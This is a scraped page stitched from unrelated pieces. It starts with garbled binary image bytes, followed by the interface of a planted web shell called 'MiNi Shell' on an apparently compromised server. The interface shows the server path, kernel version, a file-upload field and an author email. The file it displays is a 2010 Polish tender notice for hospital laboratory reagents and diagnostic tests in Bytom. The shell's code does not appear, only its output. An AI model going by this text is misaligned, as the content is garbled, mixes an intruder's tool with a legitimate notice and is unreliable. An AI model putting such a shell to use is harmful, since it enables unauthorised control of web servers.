JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100614/152025-N-2010.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na zakup wraz z dostawą odczynników dla potrzeb własnych  Szpitala Specjalistycznego Nr 2 w Bytomiu</b><br>
<b>Numer ogłoszenia: 152025 - 2010; data zamieszczenia: 14.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 032 7861400, faks 032 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zakup wraz z dostawą odczynników dla potrzeb własnych  Szpitala Specjalistycznego Nr 2 w Bytomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest zakup odczynników diagnostycznych II dla potrzeb własnych szpitala określonych  przez Zamawiającego w Pakietach nr 1 - 10 stanowiącego załącznik   A   do SIWZ :
Pakiet Nr 	1	ODCZYNNIK DO ANALIZATORA BIAŁEK SEBIA
Pakiet Nr 	2	ODCZYNNIKI DO APARATU DIGITRAPPER PH
Pakiet Nr 	3	ODCZYNNIKI DO OZNACZANIA HBA 1 C DO APARATU NYCO CARD
Pakiet Nr 	4	ODCZYNNIKI DO OZNACZANIA MIKROALBUMIN DO APARATU HEMO CUE
Pakiet Nr 	5	TESTY ALERGOLOGICZNE
Pakiet Nr 	6	TESTY NASKÓRKOWE
Pakiet Nr 	7	ODCZYNNIK DO BADAŃ CYTOCHEMICZNYCH
Pakiet Nr 	8	KRĄŻKI DIAGNOSTYCZNE
Pakiet Nr 	9	KRĄŻKI DO BADANIA WRAŻLIWOŚCI NA ANTYBIOTYKI
Pakiet Nr 	10	TESTY DIAGNOSTYCZNE.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.66.00-1, 33.69.65.00-0, 33.69.62.00-7, 33.69.40.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości : 725,90 zł ( siedemset dwadzieścia pięć zł dziewięćdziesiąt gr.)
w przypadku złożenia oferty na pakiet nr 1 wadium w wysokości: 94,00 zł (słownie: dziewięćdziesiąt cztery zł .) 
w przypadku złożenia oferty na pakiet nr 2 wadium w wysokości: 8,40 zł (słownie: osiem zł czterdzieści gr.)
w przypadku złożenia oferty na pakiet nr 3 wadium w wysokości: 144,00 zł (słownie: sto czterdzieści cztery  zł.)
w przypadku złożenia oferty na pakiet nr 4 wadium w wysokości: 19,50 zł (słownie: dziewiętnaście zł pięćdziesiąt gr.)
w przypadku złożenia oferty na pakiet nr 5 wadium w wysokości: 74,00 zł (słownie: siedemdziesiąt cztery zł.)
w przypadku złożenia oferty na pakiet nr 6 wadium w wysokości: 178,00 zł (słownie: sto siedemdziesiąt osiem zł.)
w przypadku złożenia oferty na pakiet nr 7 wadium w wysokości: 56,00 zł (słownie: pięćdziesiąt sześć  zł.)
w przypadku złożenia oferty na pakiet nr 8 wadium w wysokości: 71,00 zł (słownie: siedemdziesiąt jeden  zł.)
w przypadku złożenia oferty na pakiet nr 9 wadium w wysokości: 76,00 zł (słownie: siedemdziesiąt  sześć zł.)
w przypadku złożenia oferty na pakiet nr 10 wadium w wysokości: 5,00 zł (słownie: pięć zł.)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust 1 pkt 1 pzp ), 
tj.: są uprawnieni do występowania w obrocie prawnym i prowadzą działalność w zakresie objętym niniejszym zamówieniem, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wiedzę i doświadczenie (art. 22 ust 1 pkt 2 pzp) .  tj.: zapewnią termin dostawy oferowanych odczynników diagnostycznych nie dłuższy niż 7 dni - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia(art. 22 ust 1 pkt 3 pzp) tj. dostawca musi zapewnić specjalistyczny transport Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej (art. 22 ust 1 pkt 4 pzp), 
tj. posiadają dostęp do wolnych środków finansowych lub zdolność kredytową zapewniającą wykonanie zamówienia przy założeniu, że zapłata za zrealizowane zamówienia nastąpi w terminie 30 dni od daty dostawy i równoczesnego otrzymania faktury, zapewni stałość cen w trakcie trwania umowy - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej (art. 22 ust 1 pkt 4 pzp), 
tj. posiadają dostęp do wolnych środków finansowych lub zdolność kredytową zapewniającą wykonanie zamówienia przy założeniu, że zapłata za zrealizowane zamówienia nastąpi w terminie 30 dni od daty dostawy i równoczesnego otrzymania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	W celu potwierdzenia, ze oferowane dostawy odpowiadają wymaganiom określonym                    w Specyfikacji Istotnych Warunków Zamówienia Zamawiający wymaga :
2.	Wypełnionych i podpisanych formularzy asortymentowo - cenowych stanowiących  załącznik A do SIWZ ( dla każdego oferowanego pakietu).
3.	Dokumentów potwierdzających oznaczenie wyrobu znakiem CE , o którym mowa                    w ustawie o wyrobach medycznych ( Dz .U. 93/04 poz. 896 ) - aktualnych na dzień składania oferty</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>4.	Kart charakterystyki dla substancji niebezpiecznej sporządzonych zgodnie                                        z Rozporządzeniem WE ( REACH ) nr 1907/2006 lub oświadczenia, że dany wyrób                     nie jest substancją niebezpieczną.
5.	Aktualnych kart charakterystyki lub oświadczenia oraz instrukcji metodycznych w języku polskim w formie pisemnej ( dołączone do oferty przetargowej oraz do pierwszej dostawy )
6.	W ramach wskazanych w załącznikach pakietach certyfikaty kontroli jakości 
7.	W ramach wskazanych w załącznikach pakietach terminy ważności</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalspec2.bytom.ids.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu ul. Stefana Batorego 15 , 41 - 902 Bytom ( pokoj numer 18 , I pietro , Zamówienia Publiczne , Bud. Dyrekcji ) lub bezpłatnie ze strony internetowej szpitala..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2010 godzina 09:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu ul. Stefana Batorego 15 , 41 - 902 Bytom ( pokoj numer 2, parter , Kancelaria Główna , Bud. Dyrekcji ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 	1	ODCZYNNIK DO ANALIZATORA BIAŁEK SEBIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Protein żel do elektroforezy żelowej do aparatu Sebia                           ( w zestawie barwnik, odbarwiacz, płytki z agarozą )  - opakowanie do 100 oznaczeń	1 500	oznaczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.66.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 	2	ODCZYNNIKI DO APARATU DIGITRAPPER PH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.			Roztwór buforowy pH 7.01 opak. a  500 ml	1	opak.
2.			Roztwór buforowy pH 1.07  opak. a  500 ml	1	opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 	3	ODCZYNNIKI DO OZNACZANIA HBA 1 C DO APARATU NYCO CARD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do oznaczania HBA 1c NYCO CARD	450	oznaczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 	4	ODCZYNNIKI DO OZNACZANIA MIKROALBUMIN DO APARATU HEMO CUE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do oznaczania mikroalbumin do aparatu Hemo Cue a 50 szt	100	oznaczeń.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 	5	TESTY ALERGOLOGICZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Testy alergologiczne punktowe :			64	szt.
1.1			Trawy		
1.2			Drzewa I		
1.3			Drzewa II		
1.4			Chwasty		
1.5			Trawy / Zboże		
1.6			Pleśnie I		
1.7			Pleśnie II		
1.8			Pióra		
1.9			Owoce cytrusowe		
1.10			Kukurydza		
1.11			Jabłko		
1.12			Cytryna		
1.13			Mandarynka		
1.14			Winogrona 		
1.15			Orzechy ziemne		
1.16			Orzechy laskowe		
1.17			Papryka		
1.18			Pomidor		
1.19			Kalafior		
1.20			Ziemniak		
1.21			Wieprzowina		
1.22			Mięso kurze		
1.23			Mięso wołowe		
1.24			Dorsz		
1.25			Mąka kukurydziana		
1.26			Mąka żytnia		
1.27			Mąka pszenna		
1.28			Mąka jęczmienna		
1.29			Jajko kurze ( całe )		
1.30			Jajko kurze ( żółtko )		
1.31			Jajko kurze ( białko )		
1.32			Mleko krowie		
1.33			Kakao		
1.34			Sierść swinki morskiej		
1.35			Sierść Chomika		
1.36			Sierść Królika		
1.37			Sierść Kota		
1.38			Sierść psa		
1.39			Sierść konia		
1.40			Wełna owcza		
1.41			Cladosporium herbarum		
1.42			Alternaria tenuis		
1.43			Farine - Dermatophagoides DP		
1.44			Farine - Dermatophagoides DF		
1.45			Histamina		
1.46			PHYS. Saline - Negative Control		
1.47			Sól fizjologiczna		
1.48			Kontrola dodatnia 		
1.49			Kontrola ujemna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 	6	TESTY NASKÓRKOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.			Test naskórkowy płatkowy opak. od 24 do 33 substancji           	10	opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 	7	ODCZYNNIK DO BADAŃ CYTOCHEMICZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zestaw do oznaczania fosfatazy alkalicznej granulocytów - FAG 	1	opak.
2.			Odczynnik Schiff do barwienia typu PAS a opak. 500 ml	4	opak.
3.			Roztwór kwasu nadjodowego              opak. 500 ml	2	opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 	8	KRĄŻKI DIAGNOSTYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.			Krążki BVX    krążki nasycone bacytracyną B, czynnikami wzrostowymi V i X do izolacji Haemophilus spp.  opak. do 50 krążków a 9 mm	50	krążków
2.			Krążki BX krążki nasycone bacytracyną B i czynnikiem X do identyfikacji Haemophilus  opak. do 50 krążków a 9 mm	50	krążków
3.			Krążki BV krążki nasycone bacytracyną B i czynnikiem V do identyfikacji Haemophilus  opak. do 50 krążków a 9 mm	50	krążków
4			Krążki EF krążki do różnicowania Enterococcus faecalis i E. faecium opak. do 50 krążków a 9 mm	200	krążków
5			Krążki BC krążki nasycone glukozą i błękitem bromotymolowym do różnicowania . Moraxella  catarrhalis opak. do 50 krążków a 9 mm	150	krążków
6			Krążki Gv krążki nasycone  0,2 j bacytracyny do ident. Gardnerella vaginalis opak. do 50 krążków a 9 mm	150	krążków
7			Krążki N krążki nasycone nowobiocyną do różnicowania bakterii S. epidermidis od 
S. saprophyticus opak. do 50 krążków a 9 mm	50	krążków
8			Krążki F Krążki nasycone furazolidonem do różnicowania bakterii Staphylococcus od Micrococcus opak. do 50 krążków a 9 mm	50	krążków
9			Krążki jałowe - O krążki bibułowe , jałowe do określania obecności czynnika hamującego wzrost bakterii                                                                                                                        opak. do 100 krążków a 9 mm	3000	krążków
10			Krążki do identyfik. Streptococcus pneumonie z hydroksykupreiną opak. do 50 krażków	250	krążków
11			Krążki z bacytracyną do identyfikacji Strepto. pyogenes  opak. do 50 krażków	100	krążków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 	9	KRĄŻKI DO BADANIA WRAŻLIWOŚCI NA ANTYBIOTYKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krążki do badania wrażliwości na antybiotyki - skada się z 76 pozycji ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 	10	TESTY DIAGNOSTYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szybki test do wykrywania Trichomonas vaginalis, Gardnerella vaginalis, Chlamydia w wymazach z pochwy , zestaw a 25 ozn.	50	ozn.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.40.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com